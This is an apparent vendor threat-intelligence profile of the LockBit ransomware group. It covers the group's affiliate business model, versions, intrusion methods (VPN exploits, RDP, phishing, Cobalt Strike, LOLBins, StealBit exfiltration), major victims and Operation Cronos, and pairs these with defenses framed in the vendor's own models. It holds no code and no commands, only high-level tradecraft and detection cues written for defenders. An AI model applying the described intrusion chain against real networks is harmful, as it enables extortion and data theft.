LockBit Ransomware Group
LockBit is the most prolific ransomware operation in recorded history by victim count, responsible for more than 2,000 confirmed attacks globally between 2020 and 2024.
Last updated Apr 11, 2026
Continue your mission
LockBit is the most prolific ransomware operation in recorded history by victim count, responsible for more than 2,000 confirmed attacks globally between 2020 and 2024.
# LockBit Ransomware Group
LockBit is the most prolific ransomware operation in recorded history by victim count, responsible for more than 2,000 confirmed attacks globally between 2020 and 2024. It operates as a Ransomware-as-a-Service (RaaS) platform: a core development team maintains the encryption software, the leak site, and the affiliate infrastructure, while a distributed network of criminal affiliates conducts the actual intrusions, negotiates ransoms, and deploys the encryptor. The affiliates keep 75 to 80 percent of collected ransom payments. The core team keeps the rest.
This structure matters for defenders. LockBit is not a hacker group that also builds ransomware. It is a software company that also runs a criminal enterprise. The distinction changes how you analyze their behavior. Core developers manage product versioning, run a bug bounty program, maintain uptime SLAs on their negotiation infrastructure, and market to prospective affiliates. Affiliates are independent operators who choose LockBit from a competitive RaaS marketplace based on reliability, encryptor quality, and revenue share.
Understanding LockBit through the lens of a product business with an affiliate distribution channel is more accurate than treating it as a single threat actor. The implication for defenders is significant: shutting down the core developers does not shut down the affiliates, who carry portable skills and can migrate to other RaaS platforms. Operation Cronos in February 2024 proved this point.
In the Planetary Defense Model, LockBit operates as a Beast in the most literal sense: a predator that reaches the geological core (DPS) and holds the data hostage. But the entry points are in the outer layers, and no single domain stops it. Defending against LockBit requires all four inner domains working simultaneously.
LockBit recruits affiliates on criminal forums and through reputation. Prospective affiliates are vetted (in their own criminal fashion), given access to the affiliate panel, and can begin conducting attacks using LockBit infrastructure. The panel provides: the encryptor binary, a customizable ransom note, access to the leak site (lockbitblog.com on the dark web), negotiation chat infrastructure, and technical support.
LockBit ran a formal bug bounty program for their own malware, paying researchers to identify flaws in LockBit code. This is organized crime with software product management practices. They published rules for affiliates, including prohibitions on attacking hospitals in certain jurisdictions (a prohibition that many affiliates ignored) and restrictions on targets in former Soviet states.
The double extortion model is standard: affiliates exfiltrate data before encrypting it, then threaten to publish on the leak site unless the ransom is paid. This creates two independent ransoms (pay to decrypt, pay to prevent publication) and ensures that even organizations with functional backups face pressure to pay.
LockBit 1.0 (ABCD variant, 2019-2020). The initial version, named for the .abcd file extension appended to encrypted files. Limited distribution, largely manual operations.
LockBit 2.0 (2021). The version that made LockBit dominant. Added StealBit, a custom data exfiltration tool designed for speed, capable of exfiltrating large volumes of data in minutes. Automated much of the lateral movement process. Added the Windows Active Directory group policy exploit to propagate encryption across domain-joined machines. This version generated the highest victim count in LockBit history.
LockBit 3.0 / LockBit Black (2022). Incorporated code from BlackMatter and DarkSide, two predecessor RaaS operations that had been shut down. Added anti-analysis features, modular architecture, and extended the bug bounty program. Ransom note naming conventions shifted across versions and affiliate customization.
LockBit Green (2023). Built partially on the leaked Conti ransomware source code. Deployed by a subset of affiliates against specific targets.
LockBit affiliates use three primary initial access vectors, all of which represent exploitable gaps in the outer PDM domains.
VPN and Remote Access Exploitation. The most common entry point. Affiliates exploit known vulnerabilities in enterprise VPN and remote access products. High-profile examples include Citrix Bleed (CVE-2023-4966, a session token hijacking vulnerability in Citrix NetScaler), Ivanti Connect Secure vulnerabilities, and FortiGate firewall exploits. These are all patched vulnerabilities. Organizations running unpatched remote access infrastructure are providing direct, unauthenticated entry to affiliates.
RDP Compromise. Affiliates purchase access to exposed RDP servers through initial access broker markets, brute force weak credentials, or reuse credentials obtained in prior breaches. RDP exposed to the internet without MFA is a reliable entry path.
Phishing. Email-based initial access, typically delivering a loader that retrieves a Cobalt Strike beacon or another post-exploitation framework for hands-on-keyboard operations.
After initial access, affiliate operations follow a consistent pattern. Cobalt Strike beacons provide post-exploitation capability. PsExec and Windows Management Instrumentation (WMI) handle lateral movement across the environment. StealBit handles data exfiltration, typically to affiliate-controlled cloud storage. Living-off-the-land binaries (LOLBins) including wmic and mshta blend with legitimate administrative activity.
When affiliates have reached sufficient coverage of the environment, they deploy the LockBit encryptor via group policy, scheduled tasks, or direct execution. Files are encrypted with extensions including .lockbit (2.0) and various custom extensions configurable per affiliate deployment. Ransom notes are dropped in every encrypted directory.
Boeing (October 2023). LockBit posted approximately 43 GB of Boeing data to their leak site after Boeing declined to pay. The breach affected Boeing's global services division.
ICBC (November 2023). Industrial and Commercial Bank of China, the world's largest bank by assets, suffered a LockBit attack that disrupted U.S. Treasury market settlement operations. Trades had to be settled manually through alternative channels. The systemic risk implications of a ransomware attack disrupting U.S. Treasury settlement attracted significant regulatory attention.
Royal Mail (January 2023). The UK national postal service suffered weeks of disruption to international shipping operations. Royal Mail refused to pay the ransom, and LockBit published negotiation transcripts along with stolen data.
Healthcare targets. LockBit affiliates repeatedly attacked hospitals and healthcare systems despite the core group's stated prohibition, demonstrating that affiliate behavior is not reliably controlled by the platform operator.
Operation Cronos was a coordinated international law enforcement action led by the UK's National Crime Agency (NCA) with participation from Europol, the FBI, the U.S. Department of Justice, and agencies from nine other countries. The operation seized LockBit's leak site infrastructure, obtained decryption keys for some victims, de-anonymized affiliate identities, and arrested several operators. The DOJ indicted LockBit's primary developer, identified as Dmitry Yuryevich Khoroshev of Russia, and offered a $10 million reward for information leading to his arrest.
LockBit rebuilt within weeks. The core infrastructure was replaced, a new leak site appeared, and affiliate operations resumed. The lesson is not that law enforcement action is ineffective. It is that a RaaS operation with distributed affiliates, anonymous cryptocurrency payments, and global infrastructure is architecturally resilient to law enforcement disruption in ways that a traditional criminal organization is not. Operation Cronos slowed LockBit's activity and disrupted specific affiliates. It did not stop the platform.
The most important thing to understand about LockBit is that no single defensive control stops it. Organizations that focus exclusively on backup recovery miss the double extortion dynamic. Organizations that focus on endpoint detection miss the initial access through unpatched VPN. Organizations that focus on patching miss the credential-based RDP access. LockBit wins against single-domain defenses.
This is why a framework like the PDM is operationally more useful than a checklist approach. The PDM reveals that stopping LockBit requires simultaneous coverage across multiple domains. DPS (Data Protection and Sovereignty) addresses the backup problem: immutable, air-gapped recovery capability makes the encryption payload a degradation event rather than a catastrophic failure. VSD (Vulnerability and Surface Defense) addresses the initial access problem: patched VPN infrastructure and no exposed RDP close the most common entry paths. IAT (Identity Access and Trust) addresses the lateral movement problem: MFA on remote access and privileged account controls limit blast radius after initial compromise. TID (Threat Intelligence and Defense) addresses the detection problem: Cobalt Strike behavioral signatures, StealBit exfiltration patterns, and LOLBin abuse sequences are detectable before encryption begins if the TID layer is calibrated for RaaS affiliate behavior.
The ICBC attack introduced a dimension that most ransomware discussions ignore: critical infrastructure systemic risk. When a ransomware attack on a single bank disrupts U.S. Treasury market settlement, the question shifts from "how does this organization recover" to "what does ransomware resilience look like at a systemic level." Regulators noticed. DORA in the EU and SEC cybersecurity disclosure rules in the U.S. are partly a response to incidents like ICBC demonstrating that enterprise ransomware is a financial stability issue, not just an IT recovery issue.
The most persistent misconception in ransomware preparedness is that strong backups eliminate ransomware risk. LockBit's double extortion model makes this false. An organization can restore from backups and still face a demand to pay for the suppression of stolen data. For organizations in regulated industries, the threatened publication of customer data, health records, or financial information creates independent liability beyond the operational disruption.
Genuine ransomware resilience requires both recovery capability (DPS: immutable backups) and exfiltration prevention (DPS: data classification and encryption at rest so stolen data is not usable; TID: detection of exfiltration activity before the volume of stolen data becomes damaging).
In the Planetary Defense Model, LockBit represents the scenario where a Beast reaches the geological core (DPS) and holds the data hostage. The Beast enters through gaps in VSD (unpatched surfaces), traverses terrain via SPH weaknesses (poor endpoint controls, LOLBin visibility gaps), moves laterally through IAT gaps (insufficient MFA on remote access, weak privileged account controls), and exfiltrates before TID detection occurs.
No single CDA methodology stops LockBit alone. This is intentional architecture, not a limitation. The PDM's concentric model means all six domains operate simultaneously, and LockBit specifically exploits the gaps between domains that organizations treat as separate programs.
CDA's Sovereign Data Protocol (SDP, DPS domain) addresses the backup problem directly: immutable, tested recovery capability means the encryption payload loses its leverage. The encryptor becomes a recovery drill, not an existential event. SDP also addresses exfiltrated data usability: data classified and encrypted at rest does not become useful to an attacker who exfiltrates it.
CDA's Continuous Surface Reduction (CSR, VSD domain) addresses the initial access problem. Citrix Bleed, Ivanti exploits, and FortiGate vulnerabilities all had patches available before affiliates exploited them at scale. Continuous surface reduction means the exploitable window closes faster than affiliates can operationalize new CVEs. Attack surface management that includes external-facing remote access infrastructure catches exposed RDP before initial access brokers do.
CDA's Zero Possession Architecture (ZPA, IAT domain) addresses the lateral movement problem: MFA on remote access, privileged account controls, and session management that limits blast radius after initial access. An affiliate who compromises one endpoint in a ZPA-compliant environment faces hard barriers to lateral movement. In environments without ZPA controls, lateral movement to domain controllers is often a matter of hours.
CDA's Predictive Defense Intelligence (PDI, TID domain) addresses the detection problem. Cobalt Strike behavioral signatures, StealBit exfiltration patterns (high-volume FTP or HTTP transfers to unusual destinations), and LOLBin abuse sequences (wmic, psexec, mshta in unusual combinations) are detectable before the encryption phase if the TID layer is calibrated for RaaS affiliate behavior patterns.
The Planetary Crisis Protocol (PCP) coordinates the response when LockBit does breach: data containment (DPS), vulnerability remediation (VSD), system recovery (SPH), credential rotation (IAT), threat eviction (TID), and regulatory notification (RGA) operating simultaneously rather than sequentially.
CISA, FBI, MS-ISAC. "Understanding Ransomware Threat Actors: LockBit." Joint Cybersecurity Advisory AA23-165A, June 2023. https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-165a
U.S. Department of Justice. "U.S. and U.K. Disrupt LockBit Ransomware Variant." DOJ Press Release, February 2024. https://www.justice.gov/opa/pr/us-and-uk-disrupt-lockbit-ransomware-variant
Europol. "Law Enforcement Disrupt World's Biggest Ransomware Operation." Europol Press Release, February 2024.
MITRE ATT&CK. "LockBit Software." MITRE ATT&CK S0532. https://attack.mitre.org/software/S0532/
Trend Micro Research. "LockBit 3.0 (LockBit Black) Ransomware." Trend Micro Research, 2022.
CDA Theater missions that address topics covered in this article.
Written by Evan Morgan
Found an issue? Help improve this article.